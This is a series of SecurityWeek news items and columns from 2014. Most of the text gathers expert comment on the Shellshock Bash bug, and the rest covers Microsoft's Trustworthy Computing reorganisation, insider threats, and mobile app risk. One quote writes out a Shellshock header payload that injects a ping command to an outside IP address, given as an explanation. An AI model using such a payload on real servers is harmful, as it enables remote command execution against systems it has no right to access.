“The Bash vulnerability simply stresses the point that there is no such thing as 100% security and that we all need to take a very circumspect and practical approach to how we make use of the devices that we use to share data both within and outside the home and our businesses. I have my doubts on whether or not this will lead to a wave of cyber-attacks, but that is not to say that the vulnerability shouldn’t be taken seriously. It is incumbent upon all of us as users to guard our data and take all reasonable precautions to ensure that we are protecting our information as best as we are realistically able.”

Steve Lowing, Director of Product Management, Promisec:

 “Generally, the Bash vulnerability could be really bad for systems, such as smart devices including IP cameras, appliances, embedded web servers on routers, etc… which are not updated frequently. The exposure for most endpoints is rapidly being addressed in the form of patches to all flavors of UNIX including Redhat and OS X. Fortunately for Microsoft, they avoid much of this pain since most Windows systems do not have Bash installed on them.

For vulnerable systems, depending on how they are leveraging the Bash shell the results could be grave. For example, a webserver that uses CGI for example would likely be configured to use Bash as the shell for executing commands and compromising this system via this vulnerability is fairly straightforward. The consequences could be to delete all web content which could mean Service level agreements (SLA)s are not met because of complete outage or deface the site which tarnishes your brand or even to be a point of infiltration for a targeted attack which could mean IP and/or sensitive customer information loss.

The IoT is the likely under the biggest risk since many of these devices and appliances are not under subject to frequent software updates like a desktop or laptop or server would be. This could result in many places for an attacker to break into and lay wait for sensitive information to come their way.”

Jason Lewis, Chief Collection and Intelligence Officer, Lookingglass Cyber Solutions:

 “The original vulnerability was patched by CVE-2014-6271. Unfortunately this patch did not completely fix the problem. This means even patched systems are vulnerable.

 

Several proof of concepts have been released.  The exploit has the ability to turn into a worm, so someone could unleash an exploit to potentially infect a huge number of hosts.”

Ron Gula, Chief Executive Officer and Chief Technical Officer, Tenable Network Security: 

 “Auditing systems for ShellShock will not be like scanning for Heartbleed. Heartbleed scans could be completed by anyone with network access with high accuracy. With ShellShock, the highest form of accuracy to test for this is to perform a patch audit. IT auditing shops that don’t have mature relationships with their IT administrators may not be able to audit for this.

 

Detecting the exploit of this is tricky. There are network IDS rules to detect the attack on unencrypted (non-SSL) web servers, but IDS rules to look for this attack over SSL or SSH won’t work. Instead, solutions which can monitor the commands run by servers and desktops can be used to identify commands which are new, anomalistic and suspect.”

Mike Spanbauer, Managing Director of Research, NSS Labs:

“Bash is an interpretive shell that makes a series of commands easy to implement on a Unix derivative. Linux is quite prevalent today throughout the Web, both as commerce platform and as commercial website platform. It happens to be the default script shell for Unix, Linux, well… you get the picture.

The core issue is that while initially the vulnerability highlights the ease with which an attacker might take over a Web server running CGI scripting, and ultimately, ‘get shell’ which offers the attacker the means to reconfigure the access environment, get to sensitive data or compromise the victim machine in many ways.

As we get to the bottom of this issue, it will certainly be revealed just how bad this particular discovery is – but there is a chance it’s bigger than Heartbleed, and that resulted in thousands of admin hours globally applying patches and fixes earlier this year.”

Contrast Security CTO and co-founder Jeff Williams:

 “This is a pretty bad bug. The problem happens because bash supports a little used syntax for ‘exported functions’ – basically a way to define a function and make it available in a child shell.   There’s a bug that continues to execute commands that are defined after the exported function.

So if you send an HTTP request with a referrer header that looks like this: Referer:() { :; }; ping -c 1 11.22.33.44. The exported function is defined by this crazy syntax () { :; };  And the bash interpreter will just keep executing commands after that function.  In this case, it will attempt to send a ping request home, thus revealing that the server is susceptible to the attack.

Fortunately there are some mitigating factors.  First, this only applies to systems that do the following things in order: 1) Accept some data from an untrusted source, like an HTTP request header, 2) Assign that data to an environment variable, 3) Execute a bash shell (either directly or through a system call).

If they send in the right data, the attacker will have achieved the holy grail of application security: ‘Remote Command Execution.’  An RCE basically means they have completely taken over the host.

Passing around data this way is a pretty bad idea, but it was the pattern back in the CGI days.  Unfortunately, there are still a lot of servers that work that way.  Even worse, custom applications may have been programmed this way, and they won’t be easy to scan for.  So we’re going to see instances of this problem for a long long time.”

Tal Klein, Vice President of Strategy at Adallom:

 “What I don’t like to see is people comparing Shellshock to Heartbleed. Shellshock is exponentially more dangerous because it allows remote code execution, meaning a successful attack could lead to the zombification of hosts. We’ve already seen one self-replicating Shellshock worm in the wild, and we’ve already seen one patch circumvention technique that requires patched Bash to be augmented in order to be ‘truly patched’. What I’m saying is that generally I hate people who wave the red flag about vulnerabilities, but this is a 10 out of 10 on the awful scale and poses a real threat to core infrastructure. Take it seriously.”

Michael Sutton, Vice President of Security Research at Zscaler:

 “Robert Graham has called the ‘Shellshock’ vulnerability affecting bash ‘bigger than Heartbleed.’ That’s a position we could defend or refute, it all depends upon how you define bigger. Will more systems be affected? Definitely. While both bash and OpenSSL, which was impacted by Heartbleed, are extremely common, bash can be found on virtually all *nix system, while the same can’t be said for OpenSSL as many systems simply would require SSL communication. That said, we must also consider exploitability and here is where I don’t feel that the risk posed by Shellshock will eclipse Heartbleed.

Exploiting Heartbleed was (is) trivially easy. The same simple malformed ‘heartbeat’ request would trigger data leakage on virtually any vulnerable system. This isn’t true for Shellshock as exploitation is dependent upon influencing bash environment variables. Doing so remotely will depend upon the exposed applications that interact with bash. Therefore, this won’t quite be a ‘one size fits all’ attack. Rather, the attacker will first need to probe servers to determine not only those that are vulnerable, but also how they can inject code into bash environment variables.

The difference here is that we have to take application logic into account with Shellshock and that was not required with Heartbleed. That said, we’re in very much in the same boat having potentially millions of vulnerable machines, many of which will simply never be patched. Shellshock, like Heartbleed, will live on indefinitely.”

Mamoon Yunus, CEO of Forum Systems: 

“The Bash vulnerability has the potential to be much worse than Heartbleed. Leaking sensitive data is obviously bad but the Bash vulnerability could lead to losing control of your entire system.

The Bash vulnerability is a prime example of why it’s critical to take a lockdown approach to open, free-for-all shell access, a practice that is all too common for on-premise and cloud-based servers. Mobile applications have caused an explosion in the number of services being built and deployed. Such services are hosted on vanilla Linux OS variants with little consideration given to security and are typically close to the corporate edge. Furthermore, a large number of vendors use open Linux OSes, install their proprietary functionality, and package commercial network devices that live close to the network edge at Tier 0. They do so with full shell access instead of building a locked-down CLI for configuration.

The Bash vulnerability is a wake-up call for corporations that continue to deploy business functionality at the edge without protecting their services and API with hardened devices that do not provide a shell-prompt for unfettered access to OS internals for anyone to exploit.”

Jody Brazil, CEO of FireMon:

“This is the kind of vulnerability that can be exploited by an external attacker with malicious intent. So, how do those from the Internet, partner networks or other outside connection gain access to this type of exposure?

An attack vector analysis that considers network access through firewalls and addresses translation can help identify which systems are truly exposed. Then, determine if it’s possible to mitigate the risk by blocking access, even temporarily. In those cases where this is not an option, prioritizing patching is essential. In other cases where, for example, where there is remote access to a vulnerable system that is not business-critical, access can be denied using existing firewalls.

This helps security organizations focus their immediate patching efforts and maximize staffing resources. It’s critical to identify the greatest risk and then prioritize remediation activities accordingly. Those are key best practices to address Bash or any vulnerability of this nature.”

Mark Stanislav, Security Researcher at Duo Security:

“While Heartbleed eventually became an easy vulnerability to exploit, it was ultimately time consuming, unreliable and rarely resulted in ‘useful’ data output. Shell Shock, however, effectively gives an attacker remote code execution on any impacted host with a much easier means to exploit than Heartbleed and greater potential results for criminals.

Once a web application or similarly afflicted application is found to be vulnerable, an attacker can do anything from download software, to read/write system files, to escalating privilege on the host or across internal networks. More damning, of course, is that the original patch to this issue seems to be flawed and now it’s a race to get a better patch released and deployed before attackers leverage this critical bug.”

Rob Sadowski, Director of Technology Solutions at RSA:

“This is a very challenging vulnerability to manage because the scope of potentially affected systems is very large, and can be exploited in a wide variety of forms across multiple attack surfaces. Further, there is no single obvious signature to help comprehensively detect attempts to exploit the vulnerability, as there are so many apps that access BASH in many different ways.

Because many organizations had to recently manage a vulnerability with similar broad scope in Heartbleed, they may have improved their processes to rapidly identify and remediate affected systems which they can leverage in their efforts here.” 

Joe Barrett, Senior Security Consultant, Foreground Security:

 “Right now, Shellshock is making people drop everything and scramble to fix patches. Security experts are still expanding the scope of vulnerability, finding more devices and more methods in which this vulnerability can be exploited. But no one has gotten hacked and been able to turn around and point and say ‘It was because of shellshock’ that I’ve seen.

 

If you have a Linux box, patch it. Now. Do you have a Windows box using Cygwin? Update Cygwin to patch it. And then start trying to categorize all of the ‘other’ devices on the network and determining if they might be vulnerable. Because chances are a lot of them are.

Unfortunately, vendors probably will never release patches to solve this for most appliances, because most [Internet-connected] appliances don’t even provide a way to apply such an update. But for the most part all you can do is try to identify affected boxes and move them behind firewalls and out of the way of anyone’s ability to reach them. Realistically, we’ll probably still be exploiting this bug in penetration tests in 8 years. Not to mention all of the actual bad guys who will be exploiting this.”

Until Next Friday…Have a Great Weekend!

Related Reading: What We Know About Shellshock So Far, and Why the Bash Bug Matters

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Microsoft Shutting Down Trustworthy Computing Unit

Posted on September 23, 2014 by in Security

As part of its reorganization efforts, Microsoft has decided to shut down its Trustworthy Computing (TwC) unit that has been focusing on improving customers’ trust in the company’s commercial products.

While TwC will no longer function as a standalone business unit, its general manager, John Lambert, noted on Twitter that they’re just moving to a new home and that “SDL [Security Development Lifecycle], operational security, pentest, MSRC [Microsoft Security Response Center], Bluehat are just under a new roof.”

Some members of the TwC team are among the 2,100 employees laid off by Microsoft last week. However, most of the team will join the company’s Cloud and Enterprise Division or the Legal and Corporate Affairs group.

“I will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA),” Scott Charney, corporate vice president of Trustworthy Computing said in a blog post on Monday. “But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations.”

“I was the architect of these changes. This is not about the company’s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,” Charney added.

Microsoft’s Trustworthy Computing initiative was announced back in 2002 by Bill Gates, who emphasized at the time the need for such a platform.

“Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms. We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched – but as an industry leader we can and must do better,” Gates said in a memo to employees.

Brad Hill, Web security technologist at eBay, explained in a post on Google+ the importance of TwC and its impact on the security landscape over the past years.

“That Trustworthy Computing diaspora today constitutes a big part of the core of the modern information security industry.  Veterans of TwC are security leaders in at Yahoo, Google, PayPal, Facebook, Adobe, VMWare and dozens of other companies,” Hill said. “From the hapless, hopeless position the industry found ourselves in a dozen years ago, we’re today starting to stand up credible defenses against nation-state level attackers. And while the heavyweight SDL processes of five years ago have been streamlined even at Microsoft, every security program today has some of the DNA of Trustworthy Computing in it and thinks about the job it exists to do in a different way because of it.”

 In addition to shutting down the Trustworthy Computing, Microsoft is closing down its research facility in Silicon Valley.

The organization plans on cutting a total of 18,000 jobs, representing 14% of its workforce. Roughly 12,500 of the job cuts are related to the recently acquired mobile device manufacturer Nokia.

 

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Insider vs. Outsider Threats: Can We Protect Against Both?

Posted on June 26, 2014 by in Security

Media reports affirm that malicious insiders are real. But unintentional or negligent actions can introduce significant risks to sensitive information too. Some employees simply forget security best practices or shortcut them for convenience reasons, while others just make mistakes.

Some may not have received sufficient security awareness training and are oblivious to the ramifications of their actions or inactions. They inadvertently download malware, accidentally misconfigure systems, or transmit and store sensitive data in ways that place it at risk of exposure.

Insider ThreatsPersonnel change too. Companies hire new employees, and promote and transfer individuals to new roles. They augment staff with temporary workers and contractors. New leadership comes onboard. Many of these insiders require legitimate access to sensitive information, but needs differ with changing roles, tenure, or contract length. It’s extremely challenging to manage user identities and access privileges in this environment, not to mention the people themselves. A person who was once trustworthy might gradually become an insider threat – while another becomes a threat immediately, overnight.

New technologies and shifting paradigms further complicate matters. The evolving trends of mobility, cloud computing and collaboration break down the traditional network perimeter and create complexity. While these new tools and business models enhance productivity and present new opportunities for competitive advantage, they also introduce new risks.

At the same time, you can’t ignore outsider threats which are responsible for the lion’s share of breaches. Since 2008, the Verizon Data Breach Investigations Report has shown that external actors – not insiders – are responsible for the vast majority of the breaches they investigated. Some of the top reasons why breaches were successful include: weak credentials, malware propagation, privilege misuse, and social tactics. These are precisely the types of weaknesses that trace back to the actions (or inactions) of insiders.

The question isn’t whether to focus on the insider or outsider threat. The question is how to defend against both – equally effectively.

What’s needed is a threat-centric approach to security that provides comprehensive visibility, continuous control, and advanced threat protection regardless of where the threat originates. To enable this new security model, look for technologies that are based on the following tenets:

Visibility-driven: Security administrators must be able to accurately see everything that is happening. When evaluating security technologies, breadth and depth of visibility are equally important to gain knowledge about environments and threats. Ask vendors if their technologies will allow you to see and gather data from a full spectrum of potential attack vectors across the network fabric, endpoints, email and web gateways, mobile devices, virtual environments, and the cloud. These technologies must also offer depth, meaning the ability to correlate that data and apply intelligence to understand context and make better decisions.

Threat-focused: Modern networks extend to wherever employees are, wherever data is, and wherever data can be accessed from. Keeping pace with constantly evolving attack vectors is a challenge for security professionals and an opportunity for insider and outsider threats. Policies and controls are essential to reduce the surface area of attack, but breaches still happen. Look for technologies that can also detect, understand, and stop threats once they’ve penetrated the network and as they unfold. Being threat-focused means thinking like an attacker, applying visibility and context to understand and adapt to changes in the environment, and then evolving protections to take action and stop threats.

Platform-based: Security is now more than a network issue; it requires an integrated system of agile and open platforms that cover the network, devices, and the cloud. Seek out a security platform that is extensible, built for scale, and can be centrally managed for unified policy and consistent controls. This is particularly important since breaches often stem from the same weaknesses regardless of whether they result from insider actions or an external actor. This constitutes a shift from deploying simply point security appliances that create security gaps, to integrating a true platform of scalable services and applications that are easy to deploy, monitor, and manage.

Protecting against today’s threats – whether they originate from the inside or the outside – is equally challenging. But they have a lot in common – tapping into many of the same vulnerabilities and methods to accomplish their missions. There’s no need to choose which to prioritize as you allocate precious resources. With the right approach to security you can protect your organization’s sensitive information from both insiders and outsiders.

Marc Solomon, Cisco’s VP of Security Marketing, has over 15 years of experience defining and managing software and software-as-a-service platforms for IT Operations and Security. He was previously responsible for the product strategy, roadmap, and leadership of Fiberlink’s MaaS360 on-demand IT Operations software and managed security services. Prior to Fiberlink, Marc was Director of Product Management at McAfee, responsible for leading a $ 650M product portfolio. Before McAfee, Marc held various senior roles at Everdream (acquired by Dell), Deloitte Consulting and HP. Marc has a Bachelor’s degree from the University of Maryland, and an MBA from Stanford University.

Previous Columns by Marc Solomon:


SecurityWeek RSS Feed

Cyber Risk Intelligence: What You Don’t Know is Most Definitely Hurting You

Posted on June 20, 2014 by in Security

Cyber Risk Intellitence

Growing up, one of my father’s favorite sayings was “luck favors the prepared.”

I must have heard it a thousand times over the years. It was almost always spoken just after some sad scenario where I had failed to stay alert, informed and aware, thus my ending up at a loss. Sometimes a big loss. It was his belief that, if you’re always broadly observant of things that affect your life, good things have a better chance of happening to you. He has always been right.

Nowadays, I find myself applying this lesson to cybersecurity and cyberdefense.

More than just nifty tools and solutions, robust IT budgets, threat intelligence firehoses and rigid security policies, I’m learning over and over again that practical, habitual day-in/day-out awareness is invaluable at helping you avoid becoming a victim of cybercrime – and lessening the impact when cybercrime inevitably happens to you and your organization.

Cybercrime is all around us.

One day it may become second nature to stay constantly informed about cyber risks facing us and our businesses. We’re certainly not there yet. Sooner or later, we may all need to get used to the idea of constantly consuming data about our risks and vulnerabilities in order to act safer. It’s likely sooner rather than later. To really accomplish this type of awareness, though, takes the right levels of information. Not just data. In fact, we’re all awash in data. But more on that later.

What we need is high-quality cybercrime information that’s comprehensive, yet also focused and simple to digest. Information that’s current, consistent, intuitive, continuous and, most importantly, easy to draw conclusions from that have meaning specific to you, your business and the decisions you face. It’s what I call “complete context.”

And there’s more.

To truly benefit from this sort of information takes more than just the info itself. Just as my father also told me, it takes focus, effort and commitment. Every day. Something he just called “hard work.”

Current Data + Contextually-Relevant Info + Continuous Awareness + Hard Work = Practical Solutions

Of course, the familiar modern-day version of my father’s favorite is “Chance favors a prepared mind” said by Louis Pasteur, French microbiologist, father of Pasteurization, and father of the Germ Theory of Disease. For Pasteur, the saying meant that, by staying diligently informed of all things surrounding your problem space, you’ll more quicker see solutions for tough problems.

For years and years he labored at the microscope, observing, collecting data and analyzing. But it was his devotion to basic research on more than just the problem itself – and the quick delivery of practical applications based on what he learned –  that led him to his biggest breakthroughs against unseen and deadly illnesses. Eventually, thanks to Pasteur’s way of working, we developed critical medicines such as antibiotics.

Studying a problem from every angle and every level always leads to more practical solutions and quicker (re)action.

Although Pasteur labored in the medical and biological fields, his work was in many ways analogous to modern cybersecurity. Today, scientists and researchers battle similar unseen forces, all around us, making us sick in various ways. Our networks and computers and mobile devices are constantly exposed to harmful pathogens and viruses. And, with the Target breach and things like Heartbleed, real people now know these things are fatal in their own way.

But in today’s world, we seem to have gone off track a bit in trying to cure our cyber ills.

In perhaps what was much the same as in Pasteur’s day, many smart people today labor to observe, collect data and draw conclusions. However, most of them, unlike Pasteur, are not able arrive at real practical breakthroughs that change the world.

Why is this the case?

For me, it’s mostly a simple answer:

We focus so much on looking down the barrel of individual microscopes, we get lost in all the low-level noise that’s far too focused on only a few dimensions of the problem.

Let me use Pasteur again to explain more simply.

Had Pasteur only observed the smallest bits floating around under his glass, he would’ve likely not been remembered in history. Instead, Pasteur gathered data about sick people, who they were, where they lived, how old they were, what gender, what symptoms they had, what prior illnesses they had been subject to, what their jobs were and what they had in common.

He observed animals, how they behaved, how long it took for them to become sick when they did, what they ate, where they lived and more. He even observed how rotting meat behaved, how it decomposed, how it compared to other plant and animal matter and on and on. He focused on all sides of the issue; the causes, the victims and, of course, their symptoms. Pasteur observed every facet of his problem set from high level to low, and turned basic data collection – from many dimensions at once and from all angles – into information he could use to draw practical conclusions.

Put simply, Pasteur had complete context by performing “intelligence gathering.” But, by focusing on more that just the threat itself, Pasteur was one of the first practitioners of risk analysis, or risk intelligence. It’s something we’ve only just begun to really apply to cyberdefense.

Continuous awareness of our own cyber risks compared to what’s possible and what’s happening around us right now is one of the missing pieces in current cyberdefense practices.

Today, we spend most of our cybersecurity efforts and dollars gathering massive amounts of data from millions of “microscoped” sources, but we rarely change perspectives or levels. We want to know what’s threatening us, but can’t seem to understand the picture is much bigger. Too rarely do we push back from the lenses trained only on data sets inside our specific organizations to pick our heads up and look around.

I like to call it “cyber navel gazing.”

You see, outside the microscope, there’s just so much other useful data – mostly not being stored and analyzed – that can be turned into helpful information, then into practical solutions.

Yet, we continuously employ 10s of 1000s of myriad tools, solutions and applications that comb through huge bins of raw packet data and endless streams of netflow and long-term signature repositories and terabytes of log files and interface dumps and more.

In fact, it’s as if all we do is peer through the scopes at our own micro worlds and draw conclusions that themselves lead to other tools begetting other massive piles of micro data.

Are these things all bad? Of course not. And they’re all part of fighting the fight against cyber disease. But in all of this we miss out on the bigger picture. Rarely do we store data, day in and day out, on what we’re getting hit with, how threats are occurring and what’s happening as a result. Neither are we matching that up to what our specific, individual symptoms are, who we are as targets, where we’re from, what types of companies we are, who our customers are, what technologies we’re using and on and on.

What would Pasteur say to us now if he were brought in to consult on our cyber sickness?

He’d probably just say, “Luck favors the prepared.” Then he’d tell us to start over. From the top this time.

Jason Polancich founder and Chief Architect at SurfWatch Labs. He is a serial entrepreneur focused on solving complex internet security and cyber-defense problems. Prior to founding SurfWatch Labs, Mr. Polancich co-founded Novii Design which was sold to Six3 Systems in 2010. In addition to completing numerous professional engineering and certification programs through the National Cryptologic School, Polancich is a graduate of the University of Alabama, with degrees in English, Political Science and Russian. He is a distinguished graduate of the Defense Language Institute (Arabic) and has completed foreign study programs through Boston University in St. Petersburg, Russia.

Previous Columns by Jason Polancich:


SecurityWeek RSS Feed

Mobile Ad Libraries Put Enterprise Data at Risk, Firm Says

Posted on June 4, 2014 by in Security

Mojave Networks Introduces Mobile Application Reputation Feature

Mojave Networks has added a new feature to the company’s professional and enterprise services in an effort to help organizations minimize the risks posed by the mobile applications used by their employees.

According to the company, organizations can use the new feature to discover potential risks by analyzing data collected and transmitted from mobile apps, and create policies for data loss prevention based on the information.

The new mobile application reputation offering, which is available immediately, includes features like customizable analytics, categorization of apps by risk level, application tracking, and integration with device management and network security solutions.

“The ‘bring your own device’ (BYOD) trend is transitioning to ‘bring your own applications’ (BYOA) as users download more and more apps to share data, increase productivity and stay connected,” noted  Garrett Larsson, CEO and co-founder of Mojave Networks.

“If any application running on a mobile device connected to the network is insecure, it can put highly sensitive corporate data at risk. Our new application reputation feature can help enterprises improve their mobile security posture by eliminating the risk of insecure applications.”

The company analyzes over 2,000 mobile apps every day by tracking 200 individual risk factors in 15 different categories. In addition to static and dynamic analysis, Mojave Networks said that it uses data from real-world usage of the tested applications to determine if an application is safe.

One risk that’s particularly problematic for enterprises is when private data is collected and sent to remote Web APIs, the company warned.

“Some of the most significant risk factors affecting corporate employees and individual mobile users, such as data loss and PII collection, occur not by the application itself, but within mobile advertising libraries and other library components such as social media or analytic tools,” Ryan Smith, Mojave’s lead threat engineer, explained in a blog post.

Based on the analysis of more than 11 million URLs to which mobile apps connect to, Mojave Threat Labs determined that business users connect to at least as many data-gathering libraries as consumers. During its analysis, the company found that 65% of applications downloaded by business users connect to an advertising network, and 40% of them connect to a social network API.

“It is critically important that users and IT Administrators understand what data is being collected from their devices, where it is being sent, and how it is being used. Given that the majority of the sensitive data being collected occurs within these third party libraries such as ad networks, social media APIs, and analytics tools, it is therefore important to fully understand each of the libraries included in your mobile apps,” Smith noted.

Founded in San Mateo, CA in 2011, Mojave Networks raised a $ 5 million round of funding in November 2013, in addition to launching a cloud-based, enterprise-grade solution that protects mobile devices starting at the network level. 

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Most Mobile Breaches Will be Tied to App Misconfiguration by 2017: Gartner

Posted on May 30, 2014 by in Security

Analyst firm Gartner is predicting that by 2017, the focus of endpoint security breaches will shift to mobile devices such as tablets and smartphones.

With nearly 2.2 billion smartphones and tablets expected to be sold in 2014, Gartner believes attackers will continue to pay more attention to mobile devices. By 2017, 75 percent of mobile security breaches will be the result of mobile application misconfigurations, analysts said.

“Mobile security breaches are — and will continue to be — the result of misconfiguration and misuse on an app level, rather than the outcome of deeply technical attacks on mobile devices,” said Dionisio Zumerle, principal research analyst at Gartner, in a statement. “A classic example of misconfiguration is the misuse of personal cloud services through apps residing on smartphones and tablets. When used to convey enterprise data, these apps lead to data leaks that the organization remains unaware of for the majority of devices.”

Doing significant damage in the world of mobile devices requires that malware be launched on devices that have been altered at the administrative level, Zumerle argued. While jailbreaking or rooting phones allows users to access device resources that are not normally accessible, they also put data in danger because they remove app-specific protections as well as the safe ‘sandbox’ provided by the operating system, he said, adding that they can also allow malware to be downloaded to the device and enable malicious actions.

“The most obvious platform compromises of this nature are ‘jailbreaking’ on iOS or ‘rooting’ on Android devices. They escalate the user’s privileges on the device, effectively turning a user into an administrator,” he said.

Gartner recommends organizations protect mobile devices using a mobile device management policy as well as app shielding and containers that protect important data. In addition, passcodes should be used alongside timeout standards and a limited number of retries. Jailbreaking or rooting devices should not be allowed.

“We also recommend that they favor mobile app reputation services and establish external malware control on content before it is delivered to the mobile device,” Zumerle said.

 

Brian Prince is a Contributing Writer for SecurityWeek.

Previous Columns by Brian Prince:


SecurityWeek RSS Feed